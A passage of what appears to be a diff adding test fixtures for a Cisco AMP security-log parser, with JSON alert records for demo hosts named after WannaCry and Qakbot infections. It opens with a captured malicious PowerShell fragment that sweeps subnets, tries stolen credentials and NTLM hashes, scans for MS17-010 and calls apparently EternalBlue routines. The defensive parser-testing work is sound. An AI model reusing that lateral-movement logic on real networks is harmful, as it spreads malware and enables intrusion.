         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ", + "parent_app": "WmiPrvSE.exe", + "parent_app_path": "C:\\Windows\\System32\\wbem", + "parent_pid": 2236, + "parent_puid": 132461352663910600, + "parent_user": "SYSTEM", + "parent_user_sid": "010100000000000512000000", + "pid": 10724, + "puid": 132465072105597400, + "ts": 1602033881727175700, + "user": "user@testdomain.com", + "user_sid": "010100000000000512000000" + } + } + ], + "cisco.amp.bp_data.details.matched_activity.limited": false, + "cisco.amp.bp_data.details.matched_activity.matched": 1, + "cisco.amp.bp_data.details.schema": "endpoint", + "cisco.amp.bp_data.details.schema_epoch": 2, + "cisco.amp.bp_data.details.sig_id": 20190517123456, + "cisco.amp.bp_data.details.sig_rev": 5, + "cisco.amp.bp_data.detection": "apde:20190517123456", + "cisco.amp.bp_data.end_ts": 1610640884, + "cisco.amp.bp_data.engine": "apde", + "cisco.amp.bp_data.id": "d2616Ab846", + "cisco.amp.bp_data.name": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.bp_data.normalized.name": "wmiprvse launched encoded powershell command", + "cisco.amp.bp_data.normalized.observables.file.name": [ + "powershell.exe", + "wmiprvse.exe" + ], + "cisco.amp.bp_data.normalized.observables.file.path": [ + "c:\\windows\\system32\\windowspowershell\\v1.0", + "c:\\windows\\system32\\wbem" + ], + "cisco.amp.bp_data.observables.file": [ + { + "md5": "a575a7610e5f003cc36df39e07c4ba7d", + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. 
All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e", + "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218", + "size": 443392, + "type_id": 1 + }, + { + "md5": "d683c112190f4b4c6d477d693ee88e35", + "name": "WmiPrvSE.exe", + "path": "C:\\Windows\\System32\\wbem", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "67858ead93feed62c0b1865369840e6e8086f53b", + "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334", + "size": 425984, + "type_id": 1 + } + ], + "cisco.amp.bp_data.remediated": false, + "cisco.amp.bp_data.severity": "medium", + "cisco.amp.bp_data.silent": false, + "cisco.amp.bp_data.start_ts": 1610640884, + "cisco.amp.bp_data.tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.bp_data.ts": 1610640884, + "cisco.amp.bp_data.type": "activity", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.event_type_id": 553648222, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.mitre_tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 810000000, + "event.action": "Threat Detection", + "event.dataset": "cisco.amp", + "event.id": 6880683125978957000, + "event.kind": "alert", + "event.module": "cisco", + 
"event.severity": 2, + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 38130, + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 717000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 68391, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": 
"test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 69603, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + 
"cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 70815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867977", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 639000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 72027, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831755", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73239, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + 
"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831754", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 74476, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ 
+ { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831753", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 873000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "qeriuwjhrf", + "file.path": "\\\\?\\C:\\Windows\\qeriuwjhrf", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 75732, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": 
[ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 732000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 76965, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412604589194870787", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 994000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": 
"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 81932, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870786", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "", + "file.path": "", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 84487, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + 
"cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870785", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 85686, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + 
"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419239055241773128", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 242000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239055241773000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88168, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:48.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419239046651838535", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], 
+ "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239050946806000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90868, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814971", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + 
